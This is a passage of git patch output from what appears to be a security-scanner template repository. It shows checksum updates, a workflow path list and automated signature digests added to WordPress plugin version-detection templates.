-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:8d7ade389cbd68d3f0636c7cdba978b2c389d59e -http/technologies/wordpress/plugins/tablepress.yaml:6905ca84704f284e628b6ad434be2615820fbb1c -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:e03bf7985e670d04e17e52959f7561a91fe78e92 -http/technologies/wordpress/plugins/templately.yaml:060101ba38ced96d17ec892a0ca92dc5f2e25609 -http/technologies/wordpress/plugins/the-events-calendar.yaml:9ac8c27e4011d3a22c9d55d93490cc41a9ea42d5 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:3fdf2413cfd6f8fcc8cbf9941ca561f24b53c5d5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:3b9ab0bbe86e8c1a1e7bb8cc2bb73aa01810c409 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:b4bccdcf0cad0e9022ff0f9e5016f95a321090c7 -http/technologies/wordpress/plugins/under-construction-page.yaml:7bd2761585ca4cea52fc3ca5e098f71105c736a0 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:42e7e9e85cb7774cc23e5c5e541dcce93350a2de +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:098ff0a32979b9ee82c9381d78117921c443e28a +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6da45134085dfb490f9c328e640ff32f2c6fe90 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e6807c6d99d3097eadfd9ea8548cfa510e5cdd96 -http/technologies/wordpress/plugins/webp-express.yaml:3dbc47eb75eb4852968361545351f16ec2153c4e -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:fb1eeb9595710518782bc04add734f26e390c920 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:76c14c6f07bea4c5fe970c1ab31af3c61b17c8d5 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:98ad1790376c5a4105132736ff9cbbf024cf8168 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:9b29c552294a589bf21ca79532e8ac9987964463 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:bce5fe28e1a5670ca4c19697573d786c84cb395d -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:d2f012056023b1e761f5b74db2f8a8d9365cc904 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:c8aa149d717fa5ae1eabe8e04cb9d75470b5b053 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:6a9ac472a7676d124506a367d5d8b6404f9af1a1 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:c571b7a9b56c252eaf096bf92fbc4dfab6405f72 -http/technologies/wordpress/plugins/woocommerce-services.yaml:a96791bc39d5f816c426deaa65fdd4c46c8f103e -http/technologies/wordpress/plugins/woocommerce.yaml:c7e5a31b4863d0a8806e1df85f7b68f1717ac2ac -http/technologies/wordpress/plugins/wordfence.yaml:649ebf96a4c4b0995fd21ee9b7c7a18a2affa10a -http/technologies/wordpress/plugins/wordpress-importer.yaml:a91762f62870bc491e77abfb7abeb1198c7bc17e -http/technologies/wordpress/plugins/wordpress-seo.yaml:c70556f7881421b5d1d33222031ac9f4178ec5e0 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:0d9e2af5b81b6e40394e75f6359f4051ab097e9e -http/technologies/wordpress/plugins/wp-crontrol.yaml:b9591dc5862acbed331ee5a5965277c21df1a46a -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:526c044faeee667d2de8d1a10e0af155de8931a4 -http/technologies/wordpress/plugins/wp-file-manager.yaml:dd8d315fb2b60f90c59b1df3903cddffc3e5325e -http/technologies/wordpress/plugins/wp-google-maps.yaml:3c869ab8c6aa1fb39282c86fa64a416286539590 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:07bd3aee59126ff4e3c4f45d2bd135d1b9ad62b3 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:601956387e05a765faaaa697ab7a199d7388a4c1 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:320d78e9ba91987b8bd9c025a817a9b2d0eb4c92 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:5d8939d49b1426c535a444c9910af602c2ad48ae -http/technologies/wordpress/plugins/wp-optimize.yaml:6d9cdaf7e432de6269fdbc0663df4821f15d294d -http/technologies/wordpress/plugins/wp-pagenavi.yaml:ea0b192243ad2a0c25ad3b9c74e0a382618addd4 -http/technologies/wordpress/plugins/wp-reset.yaml:e7204ef31e15d1c66158ff337a8a5f8157c4a4ef -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:c2e38012681ef5c9c065c6fdc66e9ab904c64e1d -http/technologies/wordpress/plugins/wp-rollback.yaml:f32c7811a58482daef32a8c3a5ad01f650a23177 -http/technologies/wordpress/plugins/wp-seopress.yaml:f8bd0f0776152e423b7cb5bfc6a58468327fcb19 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:328ef029d506a82fb9951f8e99d521d16529484b -http/technologies/wordpress/plugins/wp-smushit.yaml:ece1d01b4c4f3455785253d055dec10815a2ead9 -http/technologies/wordpress/plugins/wp-statistics.yaml:e78540c3327ad69edbdb8478add1b88a699e052b -http/technologies/wordpress/plugins/wp-super-cache.yaml:e9fa3943fc4f85a754a0f47cb9c257b3c0928b5c +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:b58f11a40960b596602de7951df689f722c42176 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:329eb13efbefb26dd0ee8d4f2eeb8f51f97bec17 -http/technologies/wordpress/plugins/wpforms-lite.yaml:6c8510d73c5c8c086b22092c9363322044743277 -http/technologies/wordpress/plugins/wps-hide-login.yaml:0e7b4631f76a21a5efd4df544b76c9925e533d39 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:4edf19e0d2bc94a2cefb3092df7b18f241cbad9a +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:068044562f411a1d1e7b068a23fee7bde5174e18 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8907,7 +8910,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c3c13736aae5a3abd885796dcd1d1f34f411e9b8 +templates-checksum.txt:ff69142f688d96911e4085fec1fa85cc19ba5e18 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 694c43b92101ca4abc187fe9c8ec9b2f7d2b3050 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 06:50:07 +0000 Subject: [PATCH 1523/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f8b12d955f..be0e519367 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'headless/2024/CVE-2024-38526.yaml' - 'http/cnvd/2023/CNVD-2023-72138.yaml' + - 'http/cves/2022/CVE-2022-38322.yaml' - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' @@ -40,6 +41,7 @@ on: - 'http/misconfiguration/installer/freshrss-installer.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' + - 'http/technologies/wordpress/plugins/fluent-smtp.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' From e24990ca6d6dddc4c778cb6bb367f9bbcaef15a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 06:50:56 +0000 Subject: [PATCH 1524/1841] Auto Template Signing [Tue Jul 23 06:50:56 UTC 2024] :robot: --- http/cves/2022/CVE-2022-38322.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2022/CVE-2022-38322.yaml b/http/cves/2022/CVE-2022-38322.yaml index b8ff4f6ce3..68fc4e4782 100644 --- a/http/cves/2022/CVE-2022-38322.yaml +++ b/http/cves/2022/CVE-2022-38322.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402206e0fdc6fcdacae40c482dddc8334c22e816c8c734fadd3874bcd0e0fe6ca8eff022011d920d8db43fcbb74db42290aa9b151c02956dd656a05d82430d1c2c923b3ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..25d977e705 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b997c48a6cd74aaff470e7d2220282141de65b8dc50ab66e618608912395677b02210094403f0748750eefd139874551fa3589c062f791d97c8acf1c93f7e3d48f75aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..7b5c7ff814 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220689e9d865acb88bed9cdc43eefd621a1f58ade7c1776762568c68be5fecb0af2022100e040e4f75646e3ff2ba41659a09b755cca2bf7b35ae376ddd58cec53fbc0d158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..59dc2b9c63 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ 